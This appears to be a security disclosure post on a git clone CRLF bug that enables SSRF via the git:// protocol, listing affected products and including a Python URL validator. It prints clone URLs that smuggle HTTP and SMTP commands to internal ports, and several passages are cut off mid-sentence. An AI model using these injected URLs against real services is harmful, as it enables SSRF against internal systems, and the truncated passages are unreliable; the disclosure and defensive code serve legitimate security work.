
git clone CRLF bug leading to SSRF in various products

Sun Nov 08 2020 18:10:00 GMT+0900 (Japan Standard Time)


When we connect to a server over the git:// protocol, we send an initial request packet that looks something like:

002dgit-upload-pack repo.git\

When the repository path contains a newline, the git clone command copies that newline (CR, LF) into the packet unchanged:

002egit-upload-pack repo

It looks harmless at first sight, but the main problem is that the injected line breaks make it possible to send packets to other ports and speak other protocols, which opens the possibility of an SSRF attack on internal services.

For example, running commands like the following

$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'

will eventually send the following packet to localhost:1234.

0050git-upload-pack /
GET / HTTP/1.1


We can somewhat create some sophisticated pro
In the same way, it is possible to send SMTP commands like the following and deliver e-mail over the SMTP protocol.

$ git clone 'git://localhost:25/,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'
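The two sides of the problem described above, as an added example that is not part of the original article or of git itself: pkt_line shows why the framing accepts an injected CR/LF (the length prefix is a plain byte count), and validate_clone_url shows the kind of pre-clone check the unaffected products apply (reject control characters after percent-decoding, restrict the port). The host value "localhost" and the default port allow-list are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Any byte below 0x20 (CR and LF included) or DEL has no place in a repo path or host.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def pkt_line(payload: bytes) -> bytes:
    """Frame one git pkt-line: 4 hex digits of total length, then the payload.

    The length includes the 4-byte prefix itself, so a 41-byte payload becomes
    '002d...'. Nothing in the framing inspects the bytes, which is why a CR/LF
    embedded in the path is shipped to the server verbatim.
    """
    total = len(payload) + 4
    if total > 0xFFFF:
        raise ValueError("payload too long for one pkt-line")
    return f"{total:04x}".encode() + payload


def upload_pack_request(path: str, host: str) -> bytes:
    """Build the initial git:// request for `path` the way git does (no sanitising)."""
    return pkt_line(f"git-upload-pack {path}\0host={host}\0".encode())


def validate_clone_url(url: str, allowed_ports=(22, 443, 9418)) -> str:
    """Reject clone URLs a service should never hand to `git clone`.

    Returns the URL unchanged when it passes; raises ValueError otherwise.
    """
    # Check the raw string first: urlsplit silently strips CR, LF and TAB
    # (Python 3.9.5+), so a literal newline would otherwise vanish from `parts`.
    if CONTROL_CHARS.search(url):
        raise ValueError("control character in URL")
    parts = urlsplit(url)
    if parts.scheme not in ("git", "https", "ssh"):
        raise ValueError(f"unsupported scheme: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("missing host")
    # The injection arrives as %0d%0a, so decode before looking for CR/LF.
    for piece in (unquote(parts.netloc), unquote(parts.path)):
        if CONTROL_CHARS.search(piece):
            raise ValueError("control character after percent-decoding")
    port = parts.port  # raises ValueError on a malformed port
    if port is not None and port not in allowed_ports:
        raise ValueError(f"port {port} is not on the allow-list")
    return url


def is_safe_clone_url(url: str) -> bool:
    """Boolean wrapper around validate_clone_url for callers that only need a verdict."""
    try:
        validate_clone_url(url)
        return True
    except ValueError:
        return False
```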

Patch Status

  • git/git has been fixed appropriately.

  • Software that relies on git clone may be affected by this vulnerability.

Affected Products

Product Name | Current Status | Reference
Kallithea    | Fixed          | Release Notes v0.63
Gogs         | Fixed          | Plans to fix in upcoming release (v0.13)
Gitea        | Fixed          | Release v1.12.6
BitBucket    | Mitigated      | Bounty awarded: P3

Unaffected Products

Product Name | Reason
GitHub       | Git protocol is not supported
Gitee        | Port part is filtered, which leads to no impact
GitLab       | CRLF characters were filtered